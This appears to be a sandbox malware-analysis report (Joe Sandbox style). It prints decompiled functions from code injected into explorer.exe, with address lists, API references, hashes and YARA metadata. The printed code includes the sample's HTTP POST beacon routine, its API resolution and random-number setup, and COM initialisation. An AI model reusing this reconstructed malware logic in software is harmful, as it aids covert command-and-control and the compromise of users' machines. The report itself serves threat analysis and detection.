					_t22 = _a4;
					 *0x9e69c = _t22;
					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
					_t24 = GetLastError();
					if(_t23 != 0 && _t24 != 0x7a) {
						memset( &_v144, 0, 0x80);
						_t55 = _t54 + 0xc;
						_t53 = 0;
						do {
							_t27 = E000895C7(_t53);
							_a8 = _t27;
							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
							E000885C2( &_a8);
							_t53 = _t53 + 1;
						} while (_t53 < 0x2710);
						E00092A5B( *0x9e69c);
						 *_t55 = 0x7c3;
						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
						 *_t55 = 0xb4e;
						_t32 = E000895E1(0x9ba28);
						_a8 = _t32;
						_t33 = GetFileAttributesW(_t32);
						_push( &_a8);
						if(_t33 == 0xffffffff) {
							E000885D5();
							_v8 = 0;
							_t37 =  *0x9e684; // 0x286f8f0
							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
							 *0x9e6a8 = _t38;
							if(_t38 == 0) {
								goto L10;
							}
							goto L12;
						}
						E000885D5();
					}
					goto L10;
				}
			}





















                            0x00085f82
                            0x00085f92
                            0x00085f9c
                            0x000860d0
                            0x000860c3
                            0x00000000
                            0x000860c5
                            0x000860d7
                            0x00086098
                            0x00000000
                            0x00086098
                            0x00085fa2
                            0x00085faa
                            0x00085fb1
                            0x00085fb3
                            0x00000000
                            0x00085fc6
                            0x00085fc6
                            0x00085fcc
                            0x00085fd2
                            0x00085fe2
                            0x00085fe7
                            0x00085fef
                            0x00085ff7
                            0x00086013
                            0x00086018
                            0x0008601b
                            0x0008601d
                            0x0008601f
                            0x0008602c
                            0x00086035
                            0x0008603e
                            0x00086043
                            0x00086044
                            0x00086052
                            0x0008605c
                            0x0008606d
                            0x00086072
                            0x00086079
                            0x00086080
                            0x00086083
                            0x0008608f
                            0x00086090
                            0x0008609c
                            0x000860a5
                            0x000860a9
                            0x000860b7
                            0x000860ba
                            0x000860c1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x000860c1
                            0x00086092
                            0x00086097
                            0x00000000
                            0x00085ff7

                            APIs
                            • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                            • SetLastError.KERNEL32(000000AA), ref: 000860D7
                              • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                              • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                              • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                            • GetLastError.KERNEL32 ref: 00085FEF
                            • memset.MSVCRT ref: 00086013
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                            • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                            • String ID: Hello qqq
                            • API String ID: 1203100507-3610097158
                            • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                            • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                            • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                            • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                            Download Yara Rule
                            C-Code - Quality: 83%
                            			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E000895C7(0x85b);
				_v60 = E000895C7(0xdc9);
				_v56 = E000895C7(0x65d);
				_v52 = E000895C7(0xdd3);
				_t105 = E000895C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E0008C379(_t214));
				_t113 =  *0x9e6a4; // 0x28531f8
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x9e6a4; // 0x28531f8
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x9e6a4; // 0x28531f8
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x9e6a4; // 0x28531f8
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x9e6a4; // 0x28531f8
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x9e6a4; // 0x28531f8
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x9e6a4; // 0x28531f8
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E0008980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x9e6a4; // 0x28531f8
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E0008980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E000895C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x9e6a4; // 0x28531f8
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
										E000885C2( &_v12);
										if(_a24 != 0) {
											E0008980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x9e6a4; // 0x28531f8
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E00089749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x9e6a4; // 0x28531f8
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x9e6a4; // 0x28531f8
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x9e6a4; // 0x28531f8
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x9e6a4; // 0x28531f8
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x9e6a4; // 0x28531f8
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x9e6a4; // 0x28531f8
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x9e6a4; // 0x28531f8
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x9e6a4; // 0x28531f8
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                            0x0008e671
                            0x0008e683
                            0x0008e68c
                            0x0008e696
                            0x0008e69a
                            0x0008e6ab
                            0x0008e6c2
                            0x0008e6cf
                            0x0008e6dc
                            0x0008e6e9
                            0x0008e6ec
                            0x0008e6f1
                            0x0008e6f6
                            0x0008e6f8
                            0x0008e700
                            0x0008e70b
                            0x0008e712
                            0x0008e71e
                            0x0008e721
                            0x0008e72f
                            0x0008e732
                            0x0008e738
                            0x0008e739
                            0x0008e73b
                            0x0008e744
                            0x0008e745
                            0x0008e74a
                            0x0008e750
                            0x0008e75a
                            0x0008e75c
                            0x0008e761
                            0x0008e761
                            0x0008e770
                            0x0008e77f
                            0x0008e783
                            0x0008e792
                            0x0008e795
                            0x0008e79a
                            0x0008e79e
                            0x0008e7a5
                            0x0008e7ac
                            0x0008e7b4
                            0x0008e7bc
                            0x0008e7c3
                            0x0008e7cb
                            0x0008e7d3
                            0x0008e7da
                            0x0008e7e2
                            0x0008e7ea
                            0x0008e7ff
                            0x0008e80c
                            0x0008e80e
                            0x0008e813
                            0x0008e813
                            0x0008e81a
                            0x0008e82b
                            0x0008e830
                            0x0008e832
                            0x0008e832
                            0x0008e846
                            0x0008e858
                            0x0008e85a
                            0x0008e85d
                            0x0008e862
                            0x0008e862
                            0x0008e869
                            0x0008e878
                            0x0008e87c
                            0x0008e8ba
                            0x0008e8bf
                            0x0008e8c7
                            0x0008e8cc
                            0x0008e8d7
                            0x0008e8dd
                            0x0008e8e7
                            0x0008e8ea
                            0x0008e8f3
                            0x0008e8f8
                            0x0008e8f8
                            0x0008e901
                            0x0008e94a
                            0x0008e94c
                            0x0008e953
                            0x0008e954
                            0x0008e957
                            0x0008e95d
                            0x0008e961
                            0x0008e962
                            0x0008e967
                            0x0008e969
                            0x0008e96f
                            0x0008e984
                            0x0008e98c
                            0x0008e9c1
                            0x0008e9c6
                            0x0008e9cb
                            0x00000000
                            0x0008e9cd
                            0x0008e98e
                            0x0008e990
                            0x0008e990
                            0x0008e999
                            0x0008e99c
                            0x0008e99e
                            0x0008e9a0
                            0x0008e9a6
                            0x0008e9a6
                            0x0008e9ab
                            0x0008e9ad
                            0x0008e9b4
                            0x0008e9b4
                            0x00000000
                            0x0008e9b7
                            0x0008e971
                            0x0008e979
                            0x00000000
                            0x0008e903
                            0x0008e903
                            0x0008e909
                            0x0008e90f
                            0x0008e912
                            0x00000000
                            0x0008e912
                            0x0008e901
                            0x0008e87e
                            0x0008e884
                            0x0008e888
                            0x0008e889
                            0x0008e88e
                            0x0008e890
                            0x0008e896
                            0x0008e8b4
                            0x0008e8b4
                            0x00000000
                            0x0008e8b4
                            0x0008e898
                            0x0008e8a2
                            0x0008e8a4
                            0x0008e8a5
                            0x0008e8aa
                            0x0008e8ac
                            0x0008e8b2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0008e86b
                            0x0008e86b
                            0x0008e914
                            0x0008e914
                            0x0008e91a
                            0x0008e91d
                            0x00000000
                            0x0008e91d
                            0x0008e81c
                            0x0008e81c
                            0x0008e91f
                            0x0008e91f
                            0x0008e925
                            0x0008e928
                            0x00000000
                            0x0008e928
                            0x0008e81a
                            0x0008e785
                            0x0008e92a
                            0x0008e92d
                            0x0008e92f
                            0x0008e932
                            0x0008e935
                            0x0008e93e
                            0x0008e943
                            0x00000000
                            0x00000000
                            0x0008e947
                            0x00000000
                            0x0008e947
                            0x0008e754
                            0x00000000

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$ErrorLast
                            • String ID: POST
                            • API String ID: 2570506013-1814004025
                            • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                            • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                            • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                            • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000916B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E000916B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                            0x000916c1
                            0x000916c8
                            0x000916d1
                            0x000916d5
                            0x00091750
                            0x00000000
                            0x00091752
                            0x000916e3
                            0x000916e5
                            0x000916ea
                            0x00000000
                            0x00000000
                            0x000916f2
                            0x000916f4
                            0x000916f9
                            0x00000000
                            0x00000000
                            0x00091703
                            0x00091707
                            0x00000000
                            0x00000000
                            0x00091709
                            0x0009170e
                            0x00091710
                            0x00091711
                            0x00091715
                            0x0009171b
                            0x00000000
                            0x00000000
                            0x00091726
                            0x0009172f
                            0x00091733
                            0x00000000
                            0x00000000
                            0x00091735
                            0x00091737
                            0x0009173f
                            0x00091741
                            0x00091742
                            0x0009174a
                            0x00000000

                            APIs
                            • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 667068680-129414566
                            • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                            • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                            • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                            • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00092122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 87%
                            			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L00092285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L000922CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E00088706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x909b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                            0x00092125
                            0x0009212a
                            0x0009212e
                            0x0009212e
                            0x00092133
                            0x00092138
                            0x00092139
                            0x0009213c
                            0x0009213d
                            0x00092142
                            0x00092145
                            0x00092146
                            0x0009214b
                            0x00092152
                            0x000921f8
                            0x000921f8
                            0x00000000
                            0x00092161
                            0x00092161
                            0x00092168
                            0x0009216c
                            0x00092173
                            0x0009217c
                            0x0009217e
                            0x0009217e
                            0x0009217c
                            0x0009218d
                            0x000921b3
                            0x000921bc
                            0x000921be
                            0x000921c4
                            0x000921f3
                            0x000921f3
                            0x000921fb
                            0x000921fe
                            0x000921fe
                            0x000921c6
                            0x000921c7
                            0x000921cd
                            0x000921cf
                            0x000921cf
                            0x000921d4
                            0x000921d3
                            0x000921d3
                            0x000921db
                            0x000921e7
                            0x000921f1
                            0x000921f1
                            0x00000000
                            0x0009219d
                            0x0009219d
                            0x0009219d
                            0x000921a3
                            0x00000000
                            0x00000000
                            0x000921a5
                            0x000921ab
                            0x000921b0
                            0x00000000
                            0x000921b0
                            0x0009218d

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: strchr$_snprintflocaleconv
                            • String ID: %.*g
                            • API String ID: 1910550357-952554281
                            • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                            • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                            • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                            • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000902B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: _snprintfqsort
                            • String ID: %I64d$false$null$true
                            • API String ID: 756996078-4285102228
                            • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                            • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                            • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                            • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                            • SysAllocString.OLEAUT32(?), ref: 0008D764
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                            • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                            • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                            • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                            • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                            • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                            • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000907F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: @$\u%04X$\u%04X\u%04X
                            • API String ID: 0-2132903582
                            • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                            • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                            • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                            • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0008D523, Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E0008D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E00088604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                            0x0008d530
                            0x0008d533
                            0x0008d536
                            0x0008d547
                            0x0008d54d
                            0x0008d55e
                            0x0008d566
                            0x0008d5b7
                            0x0008d5b7
                            0x0008d5bc
                            0x0008d5c1
                            0x0008d5c1
                            0x0008d5c4
                            0x0008d5c9
                            0x0008d5ce
                            0x0008d5ce
                            0x0008d5d1
                            0x0008d568
                            0x0008d569
                            0x0008d56f
                            0x0008d580
                            0x0008d585
                            0x00000000
                            0x0008d587
                            0x0008d594
                            0x0008d59c
                            0x00000000
                            0x0008d59e
                            0x0008d5a0
                            0x0008d5a8
                            0x00000000
                            0x0008d5aa
                            0x0008d5ad
                            0x0008d5b3
                            0x0008d5b3
                            0x0008d5a8
                            0x0008d59c
                            0x0008d585
                            0x0008d5d6

                            APIs
                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                            • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                            • String ID:
                            • API String ID: 1610782348-0
                            • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                            • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                            • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                            • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000921FF, Relevance: 7.6, APIs: 5, Instructions: 52stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E000921FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
